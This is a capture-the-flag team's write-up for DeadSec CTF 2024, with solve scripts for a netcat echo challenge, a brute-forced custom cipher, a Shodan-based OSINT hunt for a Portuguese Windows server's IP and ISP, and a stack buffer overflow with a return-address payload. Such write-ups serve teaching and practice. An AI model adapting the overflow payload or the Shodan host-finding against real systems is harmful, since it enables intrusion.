DeadSec CTF 2024
It is a CTF organized by DeadSec team, that is open to all and team participating from all over the world.
Here are the writeups of some of the challenges from the CTF
CREDITS: ckc9759, babyshark_1337, ayussshhhh, nop_nop_0x90
MISC
Mic Check
Given a netcat instance. We needed to echo the exact letter, that was provided everytime.
The catch here was, we needed to do that quickly otherwise it will output “Mic Check fail :(“ and everytime the size of the word increased by 1, upto 100. 
Here is the solve script to automate the process.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *
conn = remote('34.172.99.29', 31907)
for i in range(101):
try:
b = str(conn.recvline())
print(b)
letter = b.split()[3]
print(conn.recvuntil(b'> '))
conn.sendline(str(letter))
except:
print(conn.recvall())
CRYPTO
Flag Killer
Access the challenge files here
We are given an encrypted text -
1
0e98b103240e99c71e320dd330dd430de2629ce326a4a2b6b90cd201030926a090cfc5269f904f740cd1001c290cd10002900cd100ee59269a8269a026a4a2d05a269a82aa850d03a2b6b900883
And a flag killer code that is producing the encrypted text
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#!/usr/bin/python3
from binascii import hexlify
flag = hexlify(b'DEAD{test}').decode()
index = 0
output = ''
def FLAG_KILLER(value):
index = 0
temp = []
output = 0
while value > 0:
temp.append(2 - (value % 4) if value % 2 != 0 else 0)
value = (value - temp[index])/2
index += 1
temp = temp[::-1]
for index in range(len(temp)):
output += temp[index] * 3 ** (len(temp) - index - 1)
return output
while index < len(flag):
output += '%05x' % int(FLAG_KILLER(int(flag[index:index+3],16)))
index += 3
print(output)
We can bruteforce for the value of flag, as we know the encrypted text. Here is the solve script for it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
from binascii import unhexlify
# Load the encrypted data
with open("./enc.txt", "r") as f:
enc = f.read()
def FLAG_KILLER(value):
index = 0
temp = []
output = 0
while value > 0:
temp.append(2 - (value % 4) if value % 2 != 0 else 0)
value = (value - temp[index])/2
index += 1
temp = temp[::-1]
for index in range(len(temp)):
output += temp[index] * 3 ** (len(temp) - index - 1)
return output
def reverse_FLAG_KILLER(enc_val):
for j in range(0x1000):
if FLAG_KILLER(j) == enc_val:
return j
return None
flag = 0
for i in range(0, len(enc), 5):
encrypted_chunk = int(enc[i:i+5], 16)
original_value = reverse_FLAG_KILLER(encrypted_chunk)
if original_value is not None:
flag = (flag << 12) + original_value
flag = unhexlify(hex(flag)[2:]+"0")[:-2]+b"}"
print(flag)
OSINT
Windows Server
Access the challenge file here
We are given an image, we from it, we need to find the IP, ISP and ASN number. 
From the language, we know that the language is Portugese. So, initially I searched for Windows Server 2008 R2 in Shodan with country as Portugal. I found one IP, but on putting the details in the flag format, it didn’t work. My teammate, searched for the username in Shodan, and on putting the details accordingly formed the correct flag. 
So, the flag will be - DEAD{187.17.201.3_abcrede provedor de internet ltda_as28265}
PWN
Super CPP Calculator
Access the challenge file here
Here is the solve script for it -
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from pwn import *
p = process('./test') # if you're running a local binary
# p = remote('target_ip', target_port)
address = 0x401740
payload = b'A' * 1032 + p64(0x000000000040101a)+ p64(address)
# Receive and send the initial values
p.recvuntil(b'> ')
p.sendline(b'1')
p.recvuntil(b'> ')
p.sendline(b'10')
p.recvuntil(b'> ')
p.sendline(b'0.009515311615')
p.recvuntil(b'> ')
p.sendline(b'1337')
# Send the final payload
p.recvuntil(b'> ')
p.send(payload)
p.interactive()